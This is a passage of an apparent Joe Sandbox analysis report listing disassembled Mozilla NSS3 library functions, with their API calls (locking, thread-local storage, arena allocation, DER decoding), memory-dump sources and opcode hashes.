                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Error$Choice_DecodeTimeUtil
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1529734605-0
                                                                                                                                                                                                                                                      • Opcode ID: b0b168a3d74ffec76d73eb17694a10085facb2cfa8deea268b53177d9d8b38ee
                                                                                                                                                                                                                                                      • Instruction ID: 2769958b98d2b8984ef7d237bb316a0049d0f6c502fb4ada5162b73544ee4a5b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0b168a3d74ffec76d73eb17694a10085facb2cfa8deea268b53177d9d8b38ee
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3221F172E08210A7E710DE68DC51F8A73949B84329F154638FD6D57B80E730E90887E2
                                                                                                                                                                                                                                                      Function 6C491850 Relevance: 7.6, APIs: 5, Instructions: 76COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?,?,6C49002B,?), ref: 6C491875
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,6C49002B,?), ref: 6C49188E
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,6C49002B,?), ref: 6C4918A7
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?,?,?,?,6C49002B,?), ref: 6C491905
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,6C49002B,?), ref: 6C491912
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3539092540-0
                                                                                                                                                                                                                                                      • Opcode ID: 3525ace8ce06f9db112340df955acad6d2219220bb71059bb9d60e20300d3f6d
                                                                                                                                                                                                                                                      • Instruction ID: b0ccaa5d021d374cbd0cf9815fed14040660a14f2c188a6f392211dd70ca8444
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3525ace8ce06f9db112340df955acad6d2219220bb71059bb9d60e20300d3f6d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19214F74A446259BDB00EF79C484E99BBF8FF06359F114A29D894C7B00E730E994CBD2
                                                                                                                                                                                                                                                      Function 6C581E40 Relevance: 7.6, APIs: 5, Instructions: 75threadCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C581E5C
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
                                                                                                                                                                                                                                                      • PR_Lock.NSS3(00000000), ref: 6C581E75
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C581EAB
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C581ED0
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C581EE8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentThread$ErrorLockUnlockValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 121300776-0
                                                                                                                                                                                                                                                      • Opcode ID: 8f82d8443f40325f91a12faa91a1701402969371f38a66493c83f1fcf5903e3e
                                                                                                                                                                                                                                                      • Instruction ID: 0e3e7c132015e4ad3ee8e112b9a22b1ad29bcedb377a46287772c0c6ffe5da16
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f82d8443f40325f91a12faa91a1701402969371f38a66493c83f1fcf5903e3e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB217C74A165229BD710CF19DD40A47BBB1BF84718B258225D8299BF40D730FC54CBE5
                                                                                                                                                                                                                                                      Function 6C4CBE60 Relevance: 7.6, APIs: 5, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C47E708,00000000,00000000,00000004,00000000), ref: 6C4CBE6A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D08B4
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C4804DC,?), ref: 6C4CBE7E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C4CBEC2
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE006,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C4804DC,?,?), ref: 6C4CBED7
                                                                                                                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(?,?,00000002,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C4CBEEB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Item_$CopyError$AllocAlloc_ArenaFindTag_memcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1367977078-0
                                                                                                                                                                                                                                                      • Opcode ID: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
                                                                                                                                                                                                                                                      • Instruction ID: ab2c2be9772e236b6143e70a005437e47bdafe2eb4cfcf9abd24b3cec9ea5c4f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9711EFAEB0465567E700C965AC80F6B776D9B80B9AF044125FE04C7B72E721D80486E3
                                                                                                                                                                                                                                                      Function 6C47AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(00000000,?,6C473FFF,00000000,?,?,?,?,?,6C471A1C,00000000,00000000), ref: 6C47ADA7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C473FFF,00000000,?,?,?,?,?,6C471A1C,00000000,00000000), ref: 6C47ADB4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,6C473FFF,?,?,?,?,6C473FFF,00000000,?,?,?,?,?,6C471A1C,00000000), ref: 6C47ADD5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C5994B0,?,?,?,?,?,?,?,?,6C473FFF,00000000,?), ref: 6C47ADEC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C473FFF), ref: 6C47AE3C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2372449006-0
                                                                                                                                                                                                                                                      • Opcode ID: 7baf1a6f5bcf1fe517cdf2a783e24f8dcbf2e658b7ddfa6edc5a92eb73b341a1
                                                                                                                                                                                                                                                      • Instruction ID: d2e5103eb81cf54c8e6015b8f7604ffc411613f053b59e58ee46a999982467ab
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7baf1a6f5bcf1fe517cdf2a783e24f8dcbf2e658b7ddfa6edc5a92eb73b341a1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B110371E002045BE720EA659C51FFF73B8DF9125EF04462CEC1996B41FB20E95882E2
                                                                                                                                                                                                                                                      Function 6C4C8800 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8821
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C883D
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8856
                                                                                                                                                                                                                                                      • PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C4C8887
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8899
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2759447159-0
                                                                                                                                                                                                                                                      • Opcode ID: 574ae6e5f19e8e9c36c14327f7d3be5f2ae24ac78b80e3f196f02fa4770ef9f4
                                                                                                                                                                                                                                                      • Instruction ID: 6963236ddda4e214036d55c625ea72ba7a5e0ded6c1e85f8c3ed32d6c2428bac
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 574ae6e5f19e8e9c36c14327f7d3be5f2ae24ac78b80e3f196f02fa4770ef9f4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E62171B8A04605CFDB00EF78C884D6AB7B4FF05309F11466ADC9496B15E730E995CBA6
                                                                                                                                                                                                                                                      Function 6C4CF860 Relevance: 7.6, APIs: 5, Instructions: 65memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C4CF893
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,6C4866A0), ref: 6C4CF8AA
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4CF8B9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D1228
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C4D1238
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D124B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0,00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D125D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C4D126F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C4D1280
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C4D128E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C4D129A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C4D12A1
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C4CF8D9
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C5A18E0), ref: 6C4CF905
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Pool$Alloc_Arena_CriticalFreeItem_Sectionfree$CallClearCopyDecodeDeleteEnterInitLockOnceQuickUnlockValuecallocmemcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3757084236-0
                                                                                                                                                                                                                                                      • Opcode ID: 7ebbc7736865809c0c89126db468caa79b94a4f75f52fbfcafbd9aed56b2e956
                                                                                                                                                                                                                                                      • Instruction ID: 8320ece035ad6f9b0ad77ebfb265c9857967d14e0b51760801d08d260bc29769
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ebbc7736865809c0c89126db468caa79b94a4f75f52fbfcafbd9aed56b2e956
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D110476F013006BF300DB259D41F6B7AE89B85698F01412DEC148B791FB75D50883E3
                                                                                                                                                                                                                                                      Function 6C488FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C490710), ref: 6C488FF1
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2158,6C489150,00000000,?,?,?,6C489138,?,6C490710), ref: 6C489029
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000000,?,?,6C490710), ref: 6C48904D
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C490710), ref: 6C489066
                                                                                                                                                                                                                                                      • PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C490710), ref: 6C489078
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: PrivateThread$CallOncecallocmemcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1176783091-0
                                                                                                                                                                                                                                                      • Opcode ID: 4a00bc9e868268381df71f727941d5aa0f3619ea34ac8a5daed95d9a7db2ef9e
                                                                                                                                                                                                                                                      • Instruction ID: 1dd691c671402ce6473c33a2dba8d20b8a5e8eab85e9fc1314ec3e950e949eba
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a00bc9e868268381df71f727941d5aa0f3619ea34ac8a5daed95d9a7db2ef9e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC112571702611A7EB109AADAC04E6A32B8DBD37AEF410021FC44D6B41F753CD45D3E9
                                                                                                                                                                                                                                                      Function 6C49CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B1E10: TlsGetValue.KERNEL32 ref: 6C4B1E36
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B1E10: EnterCriticalSection.KERNEL32(?,?,?,6C48B1EE,2404110F,?,?), ref: 6C4B1E4B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B1E10: PR_Unlock.NSS3 ref: 6C4B1E76
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,6C49D079,00000000,00000001), ref: 6C49CDA5
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(?,6C49D079,00000000,00000001), ref: 6C49CDB6
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C49D079,00000000,00000001), ref: 6C49CDCF
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,6C49D079,00000000,00000001), ref: 6C49CDE2
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C49CDE9
